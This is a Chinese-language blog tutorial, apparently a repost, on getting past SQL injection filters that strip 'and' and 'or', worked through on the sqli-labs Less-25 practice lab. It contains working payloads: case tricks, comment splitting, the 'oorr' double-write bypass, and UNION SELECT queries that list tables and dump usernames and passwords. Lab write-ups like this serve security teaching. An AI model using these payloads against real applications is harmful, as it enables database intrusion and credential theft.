SQL注入 绕过and和or过滤
2021/12/9 19:47:28
本文主要是介绍SQL注入 绕过and和or过滤,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
SQL注入 绕过and和or过滤
1.基础知识介绍
1.MySQL中的大小写不敏感,大写与小写一样。
2.MySQL中的十六进制与URL编码
3.符号和关键字替换and – &&、or–||
4.内联注释与多行注释
/*! 内联注释*/
/*多行注释*/
2.去除and和or的代码分析
preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组。
$subject:要搜索替换的目标字符串或字符串数组
$id= preg_replace('/or/i',"", $id); $id= preg_replace('/AND/i',"", $id);
值得一说的是preg_replace
函数后面的/i
是指ignore
,就是忽略大小写
3.绕过去除and和or的SQL注入
1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除
2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
3.利用符号替代——and --&& or–||
我们以sqli-labs-less25
为例
1.当我们输入1
时,回显正常,当我们输入1\
时报错
2.可以判断出,此sql注入
为字符型,判断and
,or
等关键字是否被过滤
?id=1' and 1=1#
3.发现and
,or
被过滤为空,这里我使用的是双写绕过
?id=1' oorr 1=1--+
4.爆破数据库
5.爆破数据表
?id=-1'and union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3%23
6.爆破字段名
7.爆破字段内容
获取用户名和密码
?id=-1' union select 1,(select group_concat(username,passwoorrd) from users),3--+
这篇关于SQL注入 绕过and和or过滤的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-0601-电商商品中心解密:仅凭SKU真的足够吗?
- 2024-05-01为什么公共事业机构会偏爱 TiDB :TiDB 数据库在某省妇幼健康管理系统的应用
- 2024-04-26敏捷开发:想要快速交付就必须舍弃产品质量?
- 2024-04-26静态代码分析的这些好处,我竟然都不知道?
- 2024-04-26你在测试金字塔的哪一层?(下)
- 2024-04-26快刀斩乱麻,DevOps让代码评审也自动起来
- 2024-04-262024年最好用的10款ER图神器!
- 2024-04-2203-为啥大模型LLM还没能完全替代你?
- 2024-04-2101-大语言模型发展
- 2024-04-17基于SpringWeb MultipartFile文件上传、下载功能